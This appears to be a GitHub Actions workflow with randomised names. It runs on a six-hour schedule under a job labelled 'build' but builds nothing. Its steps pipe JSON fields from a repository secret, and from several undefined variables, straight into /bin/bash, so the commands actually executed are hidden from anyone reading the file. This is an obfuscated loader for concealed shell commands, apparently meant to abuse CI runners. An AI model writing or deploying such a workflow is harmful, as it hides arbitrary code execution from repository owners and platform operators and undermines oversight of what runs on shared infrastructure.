name: xiangchenyu2603
on:
  workflow_dispatch:
  schedule:
    - cron: '4 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xiangchenyu2603
        env:
          m88308: ${{ secrets.m88308 }}
        run: |
          echo $m88308 | jq -r .eliqk5428 | /bin/bash
          echo $jt1 | jq -r .h3 | /bin/bash
          echo $vd7690 | jq -r .xf46 | /bin/bash
          echo $b77 | jq -r .m06 | /bin/bash
          echo $hgxs4841 | jq -r .gwhf5810 | /bin/bash
          echo $tuxq605 | jq -r .djg195 | /bin/bash
          echo $xbgo41 | jq -r .sk1880 | /bin/bash
          echo $g47 | jq -r .bc2 | /bin/bash

